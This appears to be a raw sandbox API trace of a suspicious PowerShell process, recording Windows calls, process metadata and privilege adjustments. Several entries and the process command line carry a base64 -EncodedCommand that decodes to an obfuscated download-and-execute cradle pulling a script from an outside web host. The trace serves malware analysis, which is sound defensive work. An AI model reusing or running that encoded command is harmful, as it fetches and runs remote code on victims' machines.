	[0327.787] FindNextFileW (in: hFindFile=0x3ccdb0, lpFindFileData=0x1c84dfd0 | out: lpFindFileData=0x1c84dfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0327.787] FindClose (in: hFindFile=0x3ccdb0 | out: hFindFile=0x3ccdb0) returned 1
	[0327.787] SetErrorMode (uMode=0x1) returned 0x1
	[0327.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c84e0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0327.788] SetErrorMode (uMode=0x1) returned 0x1
	[0327.788] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c84e2f0 | out: lpFileInformation=0x1c84e2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0327.788] SetErrorMode (uMode=0x1) returned 0x1
	[0328.763] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0328.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.763] CoTaskMemFree (pv=0x3a7540) 
	[0329.276] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0329.276] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.277] CoTaskMemFree (pv=0x3a7540) 
	[0329.280] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0329.280] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.280] CoTaskMemFree (pv=0x3a7540) 
	[0329.289] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0329.289] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.289] CoTaskMemFree (pv=0x3a7540) 
	[0329.968] CoTaskMemAlloc (cb=0x3b) returned 0x1b7bc4c0
	[0330.453] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c84e4d8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c84e4d8) returned 0x4550
	[0330.460] CoTaskMemFree (pv=0x1b7bc4c0) 
	[0330.463] GetConsoleWindow () returned 0x1020a
	[0330.470] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0330.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.470] CoTaskMemFree (pv=0x3a7540) 
	[0330.471] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0330.471] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.471] CoTaskMemFree (pv=0x3a7540) 
	[0330.477] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0330.477] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.477] CoTaskMemFree (pv=0x3a7540) 
	[0330.480] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c84e520 | out: pNumArgs=0x1c84e520) returned 0x1b7c12a0*=""
	[0330.481] lstrlenW (lpString="-EncodedCommand") returned 15
	[0330.484] CoTaskMemAlloc (cb=0x22) returned 0x1b7bc870
	[0330.484] RtlMoveMemory (in: Destination=0x1b7bc870, Source=0x1b7c12c2, Length=0x20 | out: Destination=0x1b7bc870) 
	[0330.484] CoTaskMemFree (pv=0x1b7bc870) 
	[0330.484] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0330.484] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7a8d70
	[0330.484] RtlMoveMemory (in: Destination=0x1b7a8d70, Source=0x1b7c12e2, Length=0x2f2 | out: Destination=0x1b7a8d70) 
	[0330.484] CoTaskMemFree (pv=0x1b7a8d70) 
	[0330.485] LocalFree (hMem=0x1b7c12a0) returned 0x0
	[0331.185] CoTaskMemAlloc (cb=0x804) returned 0x1b7e8310
	[0331.186] GetConsoleTitleW (in: lpConsoleTitle=0x1b7e8310, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0331.186] CoTaskMemFree (pv=0x1b7e8310) 
	[0331.219] CoTaskMemAlloc (cb=0x38e) returned 0x1b7c12a0
	[0331.219] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c84e480*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f962e8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f962e8*(hProcess=0x36c, hThread=0x368, dwProcessId=0xf2c, dwThreadId=0xf30)) returned 1
	[0331.498] CoTaskMemFree (pv=0x1b7c12a0) 
	[0331.500] CloseHandle (hObject=0x368) returned 1
	[0331.500] CoTaskMemAlloc (cb=0x3b) returned 0x1b7bc4c0
	[0331.500] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c84e528, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c84e528) returned 0x4550
	[0331.501] CoTaskMemFree (pv=0x1b7bc4c0) 
	[0332.364] GetCurrentProcess () returned 0xffffffffffffffff
	[0332.364] GetCurrentProcess () returned 0xffffffffffffffff
	[0332.364] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c84e608, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c84e608*=0x368) returned 1

Process:
	id = "13"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x35f34000"
	os_pid = "0x9f4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 74
	os_tid = 0xa04

	[0266.127] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0268.620] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0268.620] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0268.620] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0268.620] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0271.711] sprintf_s (in: _DstBuf=0x1cef38, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0273.561] GetVersionExW (in: lpVersionInformation=0x1cda40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cda40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0273.563] GetVersionExW (in: lpVersionInformation=0x1cda40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cda40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0273.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0273.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0273.573] GetVersionExW (in: lpVersionInformation=0x1cd7b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cd7b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0273.574] SetErrorMode (uMode=0x1) returned 0x1
	[0273.575] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cd910 | out: lpFileInformation=0x1cd910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0273.577] SetErrorMode (uMode=0x1) returned 0x1
	[0273.580] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cdb80 | out: lpdwHandle=0x1cdb80) returned 0x94c
	[0273.583] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bc72d8 | out: lpData=0x2bc72d8) returned 1
	[0273.585] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdaf8, puLen=0x1cdaf0 | out: lplpBuffer=0x1cdaf8*=0x2bc7374, puLen=0x1cdaf0) returned 1
	[0273.587] lstrlenW (lpString="䅁") returned 1
	[0274.121] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x2bc7450, puLen=0x1cda60) returned 1
	[0274.122] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0274.124] CoTaskMemAlloc (cb=0x2e) returned 0x2f4ca0
	[0274.124] lstrcpyW (in: lpString1=0x2f4ca0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0274.125] CoTaskMemFree (pv=0x2f4ca0) 
	[0274.125] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x2bc74a4, puLen=0x1cda60) returned 1
	[0274.125] lstrlenW (lpString="System.Management.Automation") returned 28
	[0274.126] CoTaskMemAlloc (cb=0x3c) returned 0x2f2290
	[0274.126] lstrcpyW (in: lpString1=0x2f2290, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0274.126] CoTaskMemFree (pv=0x2f2290) 
	[0274.126] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x2bc7500, puLen=0x1cda60) returned 1
	[0274.126] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0274.126] CoTaskMemAlloc (cb=0x20) returned 0x2f2c70
	[0274.126] lstrcpyW (in: lpString1=0x2f2c70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0274.126] CoTaskMemFree (pv=0x2f2c70) 
	[0274.126] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x2bc7540, puLen=0x1cda60) returned 1
	[0274.126] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0274.126] CoTaskMemAlloc (cb=0x44) returned 0x2f2290
	[0274.126] lstrcpyW (in: lpString1=0x2f2290, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0274.126] CoTaskMemFree (pv=0x2f2290) 
	[0274.126] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x2bc75a8, puLen=0x1cda60) returned 1
	[0274.126] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0274.126] CoTaskMemAlloc (cb=0x76) returned 0x2a4220
	[0274.126] lstrcpyW (in: lpString1=0x2a4220, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0274.126] CoTaskMemFree (pv=0x2a4220) 
	[0274.127] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x2bc7644, puLen=0x1cda60) returned 1
	[0274.127] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0274.127] CoTaskMemAlloc (cb=0x44) returned 0x2f2290
	[0274.127] lstrcpyW (in: lpString1=0x2f2290, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0274.127] CoTaskMemFree (pv=0x2f2290) 
	[0274.127] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x2bc76a8, puLen=0x1cda60) returned 1
	[0274.127] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0274.127] CoTaskMemAlloc (cb=0x58) returned 0x25a9f0
	[0274.127] lstrcpyW (in: lpString1=0x25a9f0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0274.127] CoTaskMemFree (pv=0x25a9f0) 
	[0274.127] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x2bc7724, puLen=0x1cda60) returned 1
	[0274.127] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0274.127] CoTaskMemAlloc (cb=0x20) returned 0x2f2c70
	[0274.127] lstrcpyW (in: lpString1=0x2f2c70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0274.127] CoTaskMemFree (pv=0x2f2c70) 
	[0274.127] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x2bc73cc, puLen=0x1cda60) returned 1
	[0274.127] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0274.127] CoTaskMemAlloc (cb=0x66) returned 0x2f0530
	[0274.127] lstrcpyW (in: lpString1=0x2f0530, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0274.127] CoTaskMemFree (pv=0x2f0530) 
	[0274.127] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x0, puLen=0x1cda60) returned 0
	[0274.127] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x0, puLen=0x1cda60) returned 0
	[0274.127] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cda68, puLen=0x1cda60 | out: lplpBuffer=0x1cda68*=0x0, puLen=0x1cda60) returned 0
	[0274.128] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cda38, puLen=0x1cda30 | out: lplpBuffer=0x1cda38*=0x2bc7374, puLen=0x1cda30) returned 1
	[0274.129] CoTaskMemAlloc (cb=0x204) returned 0x2a94b0
	[0274.129] VerLanguageNameW (in: wLang=0x0, szLang=0x2a94b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0274.130] CoTaskMemFree (pv=0x2a94b0) 
	[0274.130] VerQueryValueW (in: pBlock=0x2bc72d8, lpSubBlock="\\", lplpBuffer=0x1cda88, puLen=0x1cda80 | out: lplpBuffer=0x1cda88*=0x2bc7300, puLen=0x1cda80) returned 1
	[0274.136] GetCurrentProcessId () returned 0x9f4
	[0274.152] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1cc9b0 | out: lpLuid=0x1cc9b0*(LowPart=0x14, HighPart=0)) returned 1
	[0274.612] GetCurrentProcess () returned 0xffffffffffffffff
	[0274.613] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1cc9d0 | out: TokenHandle=0x1cc9d0*=0x2f0) returned 1
	[0274.614] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2bcab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0274.615] CloseHandle (hObject=0x2f0) returned 1
	[0274.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x2f0
	[0274.628] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2bcabb8, cb=0x200, lpcbNeeded=0x1cd9e8 | out: lphModule=0x2bcabb8, lpcbNeeded=0x1cd9e8) returned 1
	[0274.630] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13f370000, lpmodinfo=0x2bcae28, cb=0x18 | out: lpmodinfo=0x2bcae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0274.632] CoTaskMemAlloc (cb=0x804) returned 0x2fbd80
	[0274.632] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13f370000, lpBaseName=0x2fbd80, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0274.632] CoTaskMemFree (pv=0x2fbd80) 
	[0274.633] CoTaskMemAlloc (cb=0x804) returned 0x2fbd80
	[0274.633] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13f370000, lpFilename=0x2fbd80, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0274.633] CoTaskMemFree (pv=0x2fbd80) 
	[0274.634] CloseHandle (hObject=0x2f0) returned 1
	[0274.650] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x9f4) returned 0x2f0
	[0274.651] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x1cdb18 | out: lpExitCode=0x1cdb18*=0x103) returned 1
	[0275.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bcb088, Length=0x20000, ResultLength=0x1cdae0 | out: SystemInformation=0x12bcb088, ResultLength=0x1cdae0*=0x12e20) returned 0x0
	[0275.063] EnumWindows (lpEnumFunc=0x2b466ac, lParam=0x0) returned 1
	[0277.799] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0278.885] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x558
	[0279.242] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.242] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.242] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.242] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x538
	[0279.242] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.242] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x778
	[0279.243] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x778
	[0279.243] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.243] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.243] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
